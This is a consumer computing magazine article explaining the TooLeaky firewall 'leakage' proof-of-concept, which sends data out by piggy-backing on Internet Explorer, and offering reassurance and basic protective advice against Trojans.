Firewall leakage danger?

No big deal, says David Dorn, who has sorted the fix exclusively for Practical PC readers

If you read any of the security newsgroups that are out there, you may have become aware of two new 'proof of concept' applications that test personal firewalls like ZoneLabs' Zone Alarm (the personal firewall that we at PPC recommend and use ourselves) for outgoing traffic - usually referred to as 'leakage'.

To explain; a firewall should not just stop hackers from gaining access to your machine (logging into it), but should also be effective in preventing Trojan horse programs from sending any data from your PC out onto the Internet. What such programs do is to harvest personal information (it could be all your IDs and passwords for every service you use on the Internet, including personal banking etc) and then send it to a pre-determined address on the Internet. The ramifications are obvious.

A 'leaky' firewall that doesn't stop malicious programs like that is not doing the best job for you. That's one reason why we at Practical PC have recommended Zone Alarm - it is currently the best personal firewall for blocking data flow in both directions.

Having said that, though, no firewall will be effective if its user blithely grants any and every piece of software that requests it access to the Internet - you've got to exercise some thought, and follow the general rule: if you're not sure, say 'no' - you can always change your mind later having sought some advice!

TooLeaky

Now, this is where the 'TooLeaky' program comes in. Written by a researcher into computer security, it is a 'proof of concept' program that demonstrates a vulnerability in security systems. In this case, it points out that a piece of malware (malicious software) could actually use Internet Explorer (or any other browser) as the vehicle for its dastardly deeds.

What it relies on is the fact that most people (except those that are very security savvy) simply grant their Web browsers full permissions in their personal firewall. Thus, when you run the TooLeaky code, it fires up an instance of Internet Explorer, sends its message using the IE execution space (that is, it piggy-backs it), and terminates. If you've got your firewall set to allow Internet Explorer to simply go ahead and wander straight through your setup, then yes, TooLeaky will succeed every time under Windows 98 and later (including Windows XP).

If, however, you have set up your firewall such that IE has to ask permission before it connects, the TooLeaky fails - because you'd deny the connect request. For what it's worth, TooLeaky's message when it fails is, in fact, incorrect, misleading, and, in this writer's opinion, panic-mongering in the extreme.

Safety

The thing is, at this point in time, there's no such thing as a completely secure system. In fact, the only system that is completely impervious to attack is one that's switched off! There are some bad people out there that have way too much time on their hands, and use it to find ways of attacking other folks' privacy and personal information. They'll exploit each and every vulnerability that they can find in order to further their nefarious plans.

The security business is a game of catch-up. Experts in computer security do exactly the same as the bad guys, but rather than exploit the vulnerabilities they find, try to remedy them, either themselves or in cahoots with the vendors of the vulnerable software. In essence, it all comes down to who finds the problem first. If it's the good guys, then it's not so much of a problem. If it's the bad guys, then it's a bigger problem.

Don't worry

In this case, the hole that the two 'proof of concept' programs exploits is well known, and is now even better known. You can guarantee that most companies that produce personal firewalls will already be onto this, and will be working out a way to prevent the behaviour from becoming a menace.

Indeed, it's only going to be a matter of concern if you get infected with a Trojan horse in the first place. So, the following guidelines are very, very important:

• Keep antivirus programs up-to-date and run daily
• Lock down email clients with the correct security zone settings (doesn't apply to AOL email)
• Don't open attachments that you're not expecting

There's more information here about guarding against Trojans, and here and here (click the back button to come back here).

I'd strongly recommend that you read each of those three articles, if you haven't already, and implement everything we suggest in them. While you can never be 100% safe against all threats as long as your PC is running, if you do everything we suggest, you'll be as close as you can get, and it'll make it all the harder for the baddies to get at you.

 

David Dorn